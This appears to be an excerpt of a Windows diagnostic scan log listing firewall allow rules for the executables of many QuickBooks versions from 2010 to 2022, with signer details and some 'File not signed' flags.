FirewallRules: [{8C7A54AE-4564-4BAF-B838-01A6602C0791}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2015\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{6BD50263-D501-4AB0-A031-7C59A67D360E}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2015\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{668B8C95-51C6-43C6-8DB1-E67931311B63}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2015\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{88E8CA11-1849-459A-BCEA-E3725A42C642}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2015\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{98F43435-D152-4EB0-90C7-F9344C93E352}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2016\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{CFCFDA93-9E58-4A93-A6F6-34D6E9877EEC}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2016\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{3674C094-1C44-469E-961C-0B555B099B2A}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2016\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{9A30D067-7291-45B0-A7FC-9E51D37B2981}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2016\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{5E994BE9-FA90-4C43-8D84-6716917313DC}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2016\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{64F02A9D-AFDD-45D4-8558-07EC554774DB}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2016\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{163B5FA4-F8D4-4A74-999C-12EA73049CA9}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2017\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{BABBE6ED-D11E-416A-B087-1BF61FA724D8}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2017\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{6D36ADBC-80EE-4150-859D-05DF8024BCE9}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2017\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{AD36C0D4-15D5-4413-91A2-C06A964F0420}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2017\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{B79BC76F-00AB-4AD0-A233-74128CD869D2}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2017\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{0112E7BB-6B24-4508-B001-5CEE0FE3730F}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2017\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{8469BBE1-9982-4D92-AF77-C6FB253BCF00}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\qbw32.exe (Intuit, Inc.
-> Intuit Inc.)
FirewallRules: [{4B0BF735-C11C-4E26-9095-C467E6EFE645}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\qbw32.exe (Intuit, Inc.
-> Intuit Inc.)
FirewallRules: [{CF9592EB-4598-4B04-8908-5A9D4B37BEB9}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{3EFD4456-1698-4B3E-BFEA-830DE00A0652}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{8FF599A9-E9B5-439F-B4EF-B3E7790AD89C}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{8263B699-ABF3-4777-B8C0-9AD64CEA385A}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{2236F642-AF1E-43DF-BDC6-F3F62274F5FB}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2018\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{D2461E8D-4BC1-4D61-A4ED-C52AA63747A3}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2018\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{61B991DB-702A-44F9-85F0-C36A1D87A994}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2018\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{C9A260B0-90F3-42E7-83C3-A6920BE9C6E5}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2018\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{9F99AD28-5AA6-460F-BCC1-7E034DD49611}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2018\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{7DB7E0F6-7ED5-4F71-A103-95DCEDE77D62}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2018\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{9F416B5F-C66A-44EC-877E-00F71FD5D992}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\qbw32.exe (Intuit, Inc.
-> Intuit Inc.)
FirewallRules: [{CCD63AEC-A159-4464-8B80-560BDAB99B55}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\qbw32.exe (Intuit, Inc.
-> Intuit Inc.)
FirewallRules: [{9B7C996C-87B6-4EDE-9CD5-DD939A00E45E}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{1DF69C43-3B67-4841-8D6D-FDCB4747896B}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{323A3872-8526-4409-95C1-739915C2980B}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{DDC83EF6-5D0E-4703-94F5-C859D3461B9A}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{A81C1F60-5B5E-4B4C-A452-4D857AA32C55}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{B919335C-9B0E-416B-BA23-390FC6AE0D6B}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{2589B99B-6007-4195-81F2-BF1399B9ED61}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{B9FE58DC-64DF-4827-A66D-966DDB89E92D}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{E278FC2C-B44B-4583-9079-07B9210A558A}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{42BB8426-9605-4335-BB31-624C252DEF57}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{FFC04763-555B-4DB3-B0E8-B06136ACEFFC}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\qbw32.exe (Intuit, Inc.
-> Intuit Inc.)
FirewallRules: [{3C830B23-29F8-47B8-94E3-CC9090E7FE38}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\qbw32.exe (Intuit, Inc.
-> Intuit Inc.)
FirewallRules: [{10A7682F-D0CD-4E18-827E-166CF54F14B3}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{B6E76ED2-CA84-40FE-B677-9CFBB80957BC}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{7B6EF6FE-DC7A-4033-BDF3-4470D2F927BF}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{B082BAB4-A519-4351-A0DC-5E818C0869CA}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{E5A7A884-509B-4566-86A6-FB6E3CC30816}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{BBE5F3EB-7D63-47BE-B88A-9463B1374C49}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{E5768596-EB8E-407C-B712-856C46F48FF1}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{79CDEE12-E481-4FA4-96AC-22E161572505}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{7D51369C-40DF-4382-8FD4-9C067461F190}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{BF9135CC-DCB8-47CC-ABBF-8FB9E4EC4B17}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{E885502B-08F4-4BCF-99EE-D2B239E3253B}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\qbw32.exe (Intuit, Inc.
-> Intuit Inc.)
FirewallRules: [{B7EC8151-FC1C-4A15-B6F1-74BE7F4B36C3}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\qbw32.exe (Intuit, Inc.
-> Intuit Inc.)
FirewallRules: [{5FA96485-8311-4CCC-A6F7-443F4892BEA4}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{72BD12BE-66F7-4DBB-A494-DEC933457746}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{A66BE486-0C12-49F5-9986-70537C5C307D}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{60FF4338-1547-4AFB-A0E7-BD4733EFD017}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{7DD14CC0-A913-42F0-B475-938813A8E514}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2021\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{02CD14C8-580A-405C-A469-D79ACD71BDEA}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2021\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{81A4118F-3BC3-4794-AED1-D951BA9DF554}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2021\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{19CC6C52-04D1-4295-A82E-0E40E73BC29B}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2021\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{DF67E042-898D-4ED1-8871-787F33EDA58B}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2021\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{FD6D1F5D-891B-4A25-816F-C3CCD9C14A42}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2021\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{22593620-1EF6-4956-B778-D1042C1FB7A3}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\qbw32.exe (Intuit, Inc.
-> Intuit Inc.)
FirewallRules: [{A9850483-439B-4FB8-A541-C5AC16C4F086}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\qbw32.exe (Intuit, Inc.
-> Intuit Inc.)
FirewallRules: [{6DD0C8B7-FEE9-48CA-AF93-3377F5186642}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{E0D89A44-DDA5-47E1-8C12-C5991787BF6C}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\dbmanagerexe.exe
(Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{9CE8C932-75D5-4987-B2EE-7F042AB64883}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{DFF4F06D-5841-4685-B31C-172D6DCF80EE}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\filemanagement.exe
(Intuit, Inc. -> )
FirewallRules: [{8C2E53A7-9554-43CD-8AEC-7226694BC846}] => (Allow) C:\Program
Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe (Intuit, Inc.
-> Intuit Inc.)
FirewallRules: [{E1FEBA70-E763-4517-ADBB-38406408A8ED}] => (Allow) C:\Program
Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe (Intuit, Inc.
-> Intuit Inc.)
FirewallRules: [{9D7A9C02-2EB9-4B63-9170-4F3480276DDA}] => (Allow) C:\Program
Files (x86)\Common Files\Intuit\QuickBooks\qblaunch.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{F2CF4EA0-CDBF-4454-9EDE-1E4CCA3BBDC9}] => (Allow) C:\Program
Files (x86)\Common Files\Intuit\QuickBooks\qblaunch.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{3F7607E7-8439-4A43-8C0B-425B44D7C1AB}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions
21.0\CefSharp.BrowserSubprocess.exe (The CefSharp Authors) [File not signed]
FirewallRules: [{716EC28A-B355-4657-B247-A9CFD6FE1614}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\CefSharp.BrowserSubprocess.exe (The CefSharp
Authors) [File not signed]
FirewallRules: [{C1454B80-337F-4C2C-8D73-8892E104E573}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2021\CefSharp.BrowserSubprocess.exe (The CefSharp
Authors) [File not signed]
FirewallRules: [{A5E4D61E-BE9A-4F20-A096-F500A2B30BEB}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2010\qbdbmgrn.exe (Intuit, Inc.) [File not signed]
FirewallRules: [{CFF92FD2-9B39-4BBA-BC2B-B7C90DAEE771}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2010\qbdbmgrn.exe (Intuit, Inc.) [File not signed]
FirewallRules: [{E7BDA165-4098-4C78-B12B-5CB0AAD5BE3A}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2012\qbdbmgrn.exe (Intuit, Inc.) [File not signed]
FirewallRules: [{59F0281E-3A9B-4C8D-B92B-9E37A43C2EAE}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2012\qbdbmgrn.exe (Intuit, Inc.) [File not signed]
FirewallRules: [{3C3BFAC5-CECB-4082-A952-58F61CD5A386}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2013\qbdbmgrn.exe (Intuit, Inc.) [File not signed]
FirewallRules: [{FD85B37E-A8A1-4A74-92A2-C49F1502E740}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2013\qbdbmgrn.exe (Intuit, Inc.) [File not signed]
FirewallRules: [{023C759E-0EFA-4A5B-9A45-5D98B429F792}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2015\qbdbmgrn.exe (Intuit, Inc.) [File not signed]
FirewallRules: [{5B0693A3-4692-4429-966B-216F90273576}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2015\qbdbmgrn.exe (Intuit, Inc.) [File not signed]
FirewallRules: [{8DAED373-FC16-4D32-A082-993FF4616279}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2016\qbdbmgrn.exe (SAP -> Intuit, Inc.) [File not
signed]
FirewallRules: [{09FDB363-AEE4-4A24-BF3F-9DF4FF3AC60A}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2016\qbdbmgrn.exe (SAP -> Intuit, Inc.) [File not
signed]
FirewallRules: [{8C957F50-2063-4AD0-8A61-3DC4556BFA79}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2017\qbdbmgrn.exe (Intuit, Inc. -> SAP AG or an
SAP affiliate company)
FirewallRules: [{33907125-B765-4780-88D6-8D16F1BD0C74}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2017\qbdbmgrn.exe (Intuit, Inc. -> SAP AG or an
SAP affiliate company)
FirewallRules: [{3B63E981-C243-4AE8-81D6-09A364208548}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\qbdbmgrn.exe (Intuit,
Inc.) [File not signed]
FirewallRules: [{4D72CB44-1D07-4E9A-9428-C0985F78F871}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\qbdbmgrn.exe (Intuit,
Inc.) [File not signed]
FirewallRules: [{A2EC76B8-8F7D-4CDC-BEE8-6AFEB355229F}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2018\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an
SAP affiliate company)
FirewallRules: [{A3F7F09D-4B54-4ADA-8DFB-35247DD13055}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2018\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an
SAP affiliate company)
FirewallRules: [{24870936-9A37-4F08-884F-F834D8CD24FC}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\qbdbmgrn.exe (Intuit,
Inc. -> SAP SE or an SAP affiliate company)
FirewallRules: [{5234CA0F-0FC4-43DF-908B-C4095BD671B5}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\qbdbmgrn.exe (Intuit,
Inc. -> SAP SE or an SAP affiliate company)
FirewallRules: [{7BB5E244-8498-4949-B7BE-B820EE527510}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an
SAP affiliate company)
FirewallRules: [{DEBB9DA0-D253-406A-9E15-699C77664C4A}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2019\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an
SAP affiliate company)
FirewallRules: [{5A9C2311-52A1-4418-A1FC-68FF5D45BE5E}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\qbdbmgrn.exe (Intuit,
Inc. -> SAP SE or an SAP affiliate company)
FirewallRules: [{75CAC14F-629A-4416-97B8-C010A9EFF5A6}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\qbdbmgrn.exe (Intuit,
Inc. -> SAP SE or an SAP affiliate company)
FirewallRules: [{0D80441C-BC09-49F1-9D9E-221A7DB6F6D0}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an
SAP affiliate company)
FirewallRules: [{08FD5EB4-E023-4643-B7E5-6BB6776B2CDE}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2020\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an
SAP affiliate company)
FirewallRules: [{3FC649AA-CA42-43A2-9BD6-1AFD2FB9B3C0}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\qbdbmgrn.exe (Intuit,
Inc. -> SAP SE or an SAP affiliate company)
FirewallRules: [{7A0EABC1-820D-4EEB-AEB0-67A372F23024}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\qbdbmgrn.exe (Intuit,
Inc. -> SAP SE or an SAP affiliate company)
FirewallRules: [{0E59B25B-8FAF-49AC-8077-45891450A5EC}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2021\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an
SAP affiliate company)
FirewallRules: [{01EF6A93-F5F1-4A10-A481-943E2FF64D70}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2021\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an
SAP affiliate company)
FirewallRules: [{8A6C0011-C425-485D-833A-DD273D39A565}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\qbdbmgrn.exe (Intuit,
Inc. -> SAP SE or an SAP affiliate company)
FirewallRules: [{2E882A8C-7551-4B0A-B737-5ADD68A80957}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\qbdbmgrn.exe (Intuit,
Inc. -> SAP SE or an SAP affiliate company)
FirewallRules: [{DEC3B06E-BDCC-4B8D-90DF-3DC3E1202C03}] => (Allow) C:\Program
Files\Intuit\QuickBooks Enterprise Solutions 22.0\QBDBMgrN.exe (Intuit, Inc. ->
SAP SE or an SAP affiliate company)
FirewallRules: [{85B4DB04-8779-45A8-880A-D0A0F2937A4A}] => (Allow) C:\Program
Files\Intuit\QuickBooks Enterprise Solutions 22.0\QBDBMgrN.exe (Intuit, Inc. ->
SAP SE or an SAP affiliate company)
FirewallRules: [{19C18DCB-FE23-46A0-804B-FE8306D4DEDA}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions
20.0\CefSharp.BrowserSubprocess.exe (The CefSharp Authors) [File not signed]
FirewallRules: [{DAFAF92E-3A3F-4879-AD65-35AA313DE767}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2012\qbdbmgrn.exe (Intuit, Inc.) [File not signed]
FirewallRules: [{3B67D3EF-D6BE-4982-9800-035902C8044D}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2012\qbdbmgrn.exe (Intuit, Inc.) [File not signed]
FirewallRules: [{CAEFBA03-6249-4933-BDD1-2BB5BFA8F680}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2012\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{F2E2794B-E205-4B2D-A7EA-82345B3F2EF5}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2012\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{86970E28-A5A7-488E-8290-A4CB46BC5E5D}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2012\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{A758D7E8-A99D-4D8A-9248-F82256805129}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2012\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{684D354E-BC7C-425D-95BE-EDA774B448B1}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2012\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{354E07F1-B0F3-4F45-A714-797AD949CB01}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2012\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{74F9714D-12B1-474A-BA31-349110A37ED4}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2013\qbdbmgrn.exe (Intuit, Inc.) [File not signed]
FirewallRules: [{859253C4-D756-4279-AD73-D5EB58BE8CEF}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2013\qbdbmgrn.exe (Intuit, Inc.) [File not signed]
FirewallRules: [{703D7C34-C6C8-4C5A-B26B-546AE2426AEB}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2013\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{AC896071-4839-4876-B80E-92C23755CA17}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2013\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{5C469FD5-4859-4B53-9071-44B57EC38BE4}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2013\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{A985C58D-EF32-4A75-9D1D-E0CE7E8D4033}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2013\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{BD3D8E42-2580-4929-8BBC-068714606365}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2013\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{FD529F57-FDFD-4F75-9190-545E5532B561}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2013\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{26316743-FC09-4D5D-9109-9DC1789BF309}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2015\qbdbmgrn.exe (Intuit, Inc.) [File not signed]
FirewallRules: [{F2B2079A-6D96-4474-B501-296D100A5116}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2015\qbdbmgrn.exe (Intuit, Inc.) [File not signed]
FirewallRules: [{4674E736-E4CA-4406-BDF4-B505BE745592}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2015\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{E33C50AA-EF08-49A5-8C72-BFD11367779B}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2015\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{03B3743A-4B6F-453B-9262-9410068FBF5D}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2015\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{FA70C9B5-2B40-45B2-A40D-4EB9F36261DB}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2015\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{D68DF211-C4F5-4C69-A0F7-167E7D83AEFE}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2015\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{00196214-9925-417A-AADB-D61CA01BCD7D}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2015\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{45065A5B-61FB-4E78-A645-82E4B6D112A6}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2016\qbdbmgrn.exe (SAP -> Intuit, Inc.) [File not
signed]
FirewallRules: [{30009D89-472B-408C-A5F2-3B4DA3325681}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2016\qbdbmgrn.exe (SAP -> Intuit, Inc.) [File not
signed]
FirewallRules: [{65638746-FF82-4DAE-B474-FCB2A55C00E6}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2016\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{37F2F330-75F4-44AE-9397-3C4E976AFB54}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2016\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{1A5A4ED9-A34F-4FA2-A825-D67CF8551AE7}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2016\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{3B6AEF81-67F7-4285-B9C6-63725FC34967}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2016\dbmanagerexe.exe (Intuit, Inc. -> Intuit
Inc.)
FirewallRules: [{25CEE843-D0F9-4A2E-A87B-CCB969C9789E}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2016\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{1AC7CA6B-D4D5-4491-9329-889D924F8F16}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks 2016\filemanagement.exe (Intuit, Inc. -> )
